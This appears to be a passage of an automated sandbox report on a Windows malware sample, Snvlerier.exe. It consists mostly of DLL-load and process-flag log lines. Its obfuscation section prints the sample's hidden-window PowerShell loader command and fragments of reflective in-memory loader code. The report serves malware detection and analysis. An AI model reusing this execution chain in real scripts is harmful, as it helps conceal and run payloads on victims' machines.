            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Snvlerier.exeStatic file information: File size 1261140 > 1048576
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb;C source: powershell.exe, 00000001.00000002.2198489174.0000000008024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdbE.b source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2184444852.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbam" source: powershell.exe, 00000001.00000002.2198489174.0000000008024000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdbobOoC source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2197939088.0000000007F41000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2199226437.00000000093E6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Schmear $Engirding254 $Sansars), (Adfrdsreglerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Norditalien149 = [AppDomain]::CurrentDomain.GetAssemblies(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fruefrakkes)), $Pentameridae).DefineDynamicModule($Kimmis, $false).DefineType($imitated, $Fodervikke, [System.MulticastDelegate])$Alle
            Source: C:\Users\user\Desktop\Snvlerier.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"
            Source: C:\Users\user\Desktop\Snvlerier.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"Jump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00406018 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406018
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0087CE82 push eax; mov dword ptr [esp], edx1_2_0087CE94
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0087CE8F push eax; mov dword ptr [esp], edx1_2_0087CE94
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0087D518 push esp; iretd 1_2_0087D571
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088F9448 push ebx; iretd 1_2_088F9449
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FF446 push ss; retf 1_2_088FF481
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FEE7F push edx; iretd 1_2_088FEE85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FD98F pushfd ; iretd 1_2_088FD990
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FD787 push eax; ret 1_2_088FD7AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FDDA2 pushfd ; iretd 1_2_088FDDF1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FF3BF push ss; retf 1_2_088FF481
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FCBE8 push ds; iretd 1_2_088FCBEE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088FDD60 pushfd ; iretd 1_2_088FDDF1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6CBE8 push ds; iretd 6_2_03D6CBEE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6D787 push eax; ret 6_2_03D6D7AA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6D98F pushfd ; iretd 6_2_03D6D990
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6F3BF push ss; retf 6_2_03D6F481
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6DDA2 pushfd ; iretd 6_2_03D6DDF1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6DD60 pushfd ; iretd 6_2_03D6DDF1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6F446 push ss; retf 6_2_03D6F481
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D69448 push ebx; iretd 6_2_03D69449
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_03D6EE7F push edx; iretd 6_2_03D6EE85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
